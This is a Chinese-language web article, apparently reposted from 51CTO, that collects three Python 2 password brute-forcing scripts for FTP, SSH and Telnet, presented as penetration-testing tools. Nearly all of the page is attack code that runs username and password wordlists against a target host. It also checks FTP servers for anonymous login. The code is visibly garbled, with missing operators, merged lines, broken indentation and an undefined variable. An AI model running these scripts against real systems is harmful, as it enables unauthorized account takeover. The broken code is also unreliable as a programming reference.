您的位置: 网界网 > 网络学院-安全 > 正文

渗透用的python脚本之密码破解

2014年08月07日 16:16:29 | 作者:佚名 | 来源:51CTO | 查看本文手机版

摘要:在渗透测试当中,免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本,并非原创作品,但有借鉴意义。 498)this.width=498;' onmousewheel = 'javascript:return big(this)' border="0" alt="渗透用的python脚本之密...

标签
渗透测试
密码破解
python脚本

渗透测试当中,免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本,并非原创作品,但有借鉴意义。

渗透用的python脚本之密码破解

FTP暴力破解脚本

001 #!/usr/bin/env python
002 #-*-coding = utf-8-*-
003 #author:@xfk
004 #blog:@blog.sina.com.cn/kaiyongdeng
005 #date:@2012-05-08
006  
007 import sys, os, time
008 from ftplib import FTP
009 docs = """
010            [*] This was written for educational purpose and pentest only. Use it at your own risk. 
011            [*] Author will be not responsible for any damage!
012            [*] Toolname : ftp_bf.py
013            [*] Coder :
014            [*] Version : 0.1
015            [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
016        """
017  
018 if sys.platform == 'linux' or sys.platform == 'linux2':
019     clearing = 'clear'
020 else:
021     clearing = 'cls'
022 os.system(clearing)
023 R = "\033[31m";
024 G = "\033[32m";
025 Y = "\033[33m"
026 END = "\033[0m"
027 def logo():
028     print G "\n |---------------------------------------------------------------|"
029     print " | |"
030     print " | blog.sina.com.cn/kaiyongdeng |"
031     print " | 08/05/2012 ftp_bf.py v.0.1 |"
032     print " | FTP Brute Forcing Tool |"
033     print " | |"
034     print " |---------------------------------------------------------------|\n"
035     print " \n [-] %s\n" % time.strftime("%X")
036     print docs END
037  
038 def help():
039     print R "[*]-t, --target ip/hostname <> Our target"
040     print "[*]-u, --usernamelist usernamelist <> usernamelist path"
041     print "[*]-p, --passwordlist passwordlist <> passwordlist path"
042     print "[*]-h, --help help <> print this help"
043     print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt" END sys.exit(1)
044  
045 def bf_login(hostname,username,password):
046     # sys.stdout.write("\r[!]Checking : %s " % (p))
047     # sys.stdout.flush()
048     try:
049         ftp = FTP(hostname)
050         ftp.login(hostname,username, password)
051         ftp.retrlines('list')
052         ftp.quit()
053         print Y "\n[!] w00t,w00t!!! We did it ! "
054         print "[ ] Target : ",hostname, ""
055         print "[ ] User : ",username, ""
056         print "[ ] Password : ",password, "" END
057         return 1
058     # sys.exit(1)
059     except Exception, e:
060         pass except KeyboardInterrupt: print R "\n[-] Exiting ...\n" END
061     sys.exit(1)
062  
063 def anon_login(hostname):
064     try:
065         print G "\n[!] Checking for anonymous login.\n" END
066         ftp = FTP(hostname) ftp.login()
067         ftp.retrlines('LIST')
068         print Y "\n[!] w00t,w00t!!! Anonymous login successfuly !\n" END
069         ftp.quit()
070     except Exception, e:
071         print R "\n[-] Anonymous login failed...\n" END
072         pass
073  
074 def main():
075     logo()
076     try:
077         for arg in sys.argv:
078             if arg.lower() == '-t' or arg.lower() == '--target':
079                 hostname = sys.argv[int(sys.argv[1:].index(arg)) 2]
080             elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
081                 usernamelist = sys.argv[int(sys.argv[1:].index(arg)) 2]
082             elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
083                 passwordlist = sys.argv[int(sys.argv[1:].index(arg)) 2]
084             elif arg.lower() == '-h' or arg.lower() == '--help':
085                 help()
086             elif len(sys.argv) <= 1:
087                 help()
088     except:
089         print R "[-]Cheak your parametars input\n" END
090         help()
091          
092     print G "[!] BruteForcing target ..." END
093     anon_login(hostname)
094     # print "here is ok"
095     # print hostname
096     try:
097         usernames = open(usernamelist, "r")
098         user = usernames.readlines()
099         count1 = 0
100         while count1 < len(user):
101             user[count1] = user[count1].strip()
102             count1  =1
103     except:
104         print R "\n[-] Cheak your usernamelist path\n" END
105         sys.exit(1)
106          
107     # print "here is ok ",usernamelist,passwordlist
108     try:
109         passwords = open(passwordlist, "r")
110         pwd = passwords.readlines()
111         count2 = 0
112         while count2 < len(pwd):
113             pwd[count2] = pwd[count2].strip()
114             count2  =1
115     except:
116         print R "\n[-] Check your passwordlist path\n" END
117         sys.exit(1)
118  
119     print G "\n[ ] Loaded:",len(user),"usernames"
120     print "\n[ ] Loaded:",len(pwd),"passwords"
121     print "[ ] Target:",hostname
122     print "[ ] Guessing...\n" END
123     for u in user: for p in pwd:
124         result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
125         if result != 1:
126             print G "[ ]Attempt uaername:%s password:%s..." % (u,p)   R "Disenable" END
127         else:
128             print G "[ ]Attempt uaername:%s password:%s..." % (u,p)   Y "Enable" END
129         if not result :
130             print R "\n[-]There is no username ans password enabled in the list."
131             print "[-]Exiting...\n" END
132  
133 if __name__ == "__main__":
134     main()

SSH暴力破解

001 #!/usr/bin/env python
002 #-*-coding = UTF-8-*-
003 #author@:dengyongkai
004 #blog@:blog.sina.com.cn/kaiyongdeng
005  
006  
007 import sys
008 import os
009 import time
010 #from threading import Thread
011  
012 try:
013     from paramiko import SSHClient
014     from paramiko import AutoAddPolicy
015 except ImportError:
016     print G '''
017     You need paramiko module.
018  
019 http://www.lag.net/paramiko/
020  
021     Debian/Ubuntu: sudo apt-get install aptitude
022          : sudo aptitude install python-paramiko\n''' END
023     sys.exit(1)
024  
025 docs =  """
026             [*] This was written for educational purpose and pentest only. Use it at your own risk.
027             [*] Author will be not responsible for any damage!                                                              
028             [*] Toolname        : ssh_bf.py
029             [*] Author          : xfk
030             [*] Version         : v.0.2
031             [*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
032     """
033  
034  
035 if sys.platform == 'linux' or sys.platform == 'linux2':
036          clearing = 'clear'
037 else:  
038          clearing = 'cls'
039 os.system(clearing)
040  
041  
042 R = "\033[31m";
043 G = "\033[32m";
044 Y = "\033[33m"
045 END = "\033[0m"
046  
047  
048 def logo():
049          print G "\n                |---------------------------------------------------------------|"
050          print "                |                                                               |"
051          print "                |               blog.sina.com.cn/kaiyongdeng                    |"
052          print "                |                16/05/2012 ssh_bf.py v.0.2                     |"
053          print "                |                  SSH Brute Forcing Tool                       |"
054          print "                |                                                               |"
055          print "                |---------------------------------------------------------------|\n"
056          print " \n                     [-] %s\n" % time.ctime()
057          print docs END
058  
059  
060 def help():
061     print Y "       [*]-H       --hostname/ip       <>the target hostname or ip address"
062     print "     [*]-P       --port          <>the ssh service port(default is 22)"
063     print "     [*]-U       --usernamelist      <>usernames list file"
064     print "     [*]-P       --passwordlist      <>passwords list file"
065     print "     [*]-H       --help          <>show help information"
066     print "     [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]" END
067     sys.exit(1)
068      
069 def BruteForce(hostname,port,username,password):
070         '''
071         Create SSH connection to target
072         '''
073         ssh = SSHClient()
074         ssh.set_missing_host_key_policy(AutoAddPolicy())
075         try:
076             ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
077             status = 'ok'
078             ssh.close()
079         except Exception, e:
080             status = 'error'
081             pass
082     return status
083  
084  
085 def makelist(file):
086     '''
087     Make usernames and passwords lists
088     '''
089     items = []
090  
091     try:
092         fd = open(file, 'r')
093     except IOError:
094         print R 'unable to read file \'%s\'' % file END
095         pass
096  
097     except Exception, e:
098         print R 'unknown error' END
099         pass
100  
101     for line in fd.readlines():
102         item = line.replace('\n', '').replace('\r', '')
103         items.append(item)
104     fd.close() 
105     return items
106  
107 def main():
108         logo() 
109 #   print "hello wold"
110         try:   
111                 for arg in sys.argv:
112                         if arg.lower() == '-t' or arg.lower() == '--target':
113                                 hostname = str(sys.argv[int(sys.argv[1:].index(arg)) 2])
114                 if arg.lower() == '-p' or arg.lower() == '--port':
115                     port = sys.argv[int(sys.argv[1:].index(arg)) 2]
116                         elif arg.lower() == '-u' or arg.lower() == '--userlist':
117                                 userlist = sys.argv[int(sys.argv[1:].index(arg)) 2]
118                         elif arg.lower() == '-w' or arg.lower() == '--wordlist':
119                                 wordlist = sys.argv[int(sys.argv[1:].index(arg)) 2]
120                         elif arg.lower() == '-h' or arg.lower() == '--help':
121                                 help()
122             elif len(sys.argv) <= 1:
123                                 help()
124         except:
125                 print R "[-]Cheak your parametars input\n" END
126                 help()
127         print G "\n[!] BruteForcing target ...\n" END
128 #        print "here is ok"
129 #        print hostname,port,wordlist,userlist
130         usernamelist = makelist(userlist)
131         passwordlist = makelist(wordlist)
132  
133         print Y "[*] SSH Brute Force Praparing."
134         print "[*] %s user(s) loaded." % str(len(usernamelist))
135         print "[*] %s password(s) loaded." % str(len(passwordlist))
136         print "[*] Brute Force Is Starting......." END
137     try:
138             for username in usernamelist:
139                 for password in passwordlist:
140                 print G "\n[ ]Attempt uaername:%s password:%s..." % (username,password) END
141                         current = BruteForce(hostname, port, username, password)
142                             if current == 'error':
143                     print R "[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password) END
144 #                               pass
145                             else:
146                                     print G "\n[ ] ^-^ HaHa,We Got It!!!"
147                                     print "[ ] username: %s" % username
148                                     print "[ ] password: %s\n" % password END
149 #                                   sys.exit(0)
150     except:
151         print R "\n[-] There Is Something Wrong,Pleace Cheak It."
152         print "[-] Exitting.....\n" END
153         raise
154         print Y "[ ] Done.^-^\n" END
155         sys.exit(0)
156  
157  
158 if __name__ == "__main__":
159     main()

TELNET密码暴力破解

01 #!usr/bin/python
02 #Telnet Brute Forcer
03 #http://www.darkc0de.com
04 #d3hydr8[at]gmail[dot]com
05  
06 import threading, time, random, sys, telnetlib
07 from copy import copy
08  
09 if len(sys.argv) !=4:
10     print "Usage: ./telnetbrute.py "
11     sys.exit(1)
12  
13 try:
14     users = open(sys.argv[2], "r").readlines()
15 except(IOError):
16     print "Error: Check your userlist path\n"
17     sys.exit(1)
18    
19 try:
20     words = open(sys.argv[3], "r").readlines()
21 except(IOError):
22     print "Error: Check your wordlist path\n"
23     sys.exit(1)
24  
25 print "\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
26 print "\t--------------------------------------------------\n"
27 print "[ ] Server:",sys.argv[1]
28 print "[ ] Users Loaded:",len(users)
29 print "[ ] Words Loaded:",len(words),"\n"
30  
31 wordlist = copy(words)
32  
33 def reloader():
34     for word in wordlist:
35         words.append(word)
36  
37 def getword():
38     lock = threading.Lock()
39     lock.acquire()
40     if len(words) != 0:
41         value = random.sample(words,  1)
42         words.remove(value[0])
43          
44     else:
45         print "\nReloading Wordlist - Changing User\n"
46         reloader()
47         value = random.sample(words,  1)
48         users.remove(users[0])
49          
50     lock.release()
51     if len(users) ==1:
52         return value[0][:-1], users[0]
53     else:
54         return value[0][:-1], users[0][:-1]
55          
56 class Worker(threading.Thread):
57      
58     def run(self):
59         value, user = getword()
60         try:
61             print "-"*12
62             print "User:",user,"Password:",value
63             tn = telnetlib.Telnet(sys.argv[1])
64             tn.read_until("login: ")
65             tn.write(user   "\n")
66             if password:
67                     tn.read_until("Password: ")
68                     tn.write(value   "\n")
69             tn.write("ls\n")
70             tn.write("exit\n")
71             print tn.read_all()
72             print "\t\nLogin successful:",value, user
73             tn.close()
74             work.join()
75             sys.exit(2)
76         except:
77             pass
78   
79 for I in range(len(words)*len(users)):
80     work = Worker()
81     work.start()
82     time.sleep(1)

[责任编辑:孙可 sun_ke@cnw.com.cn]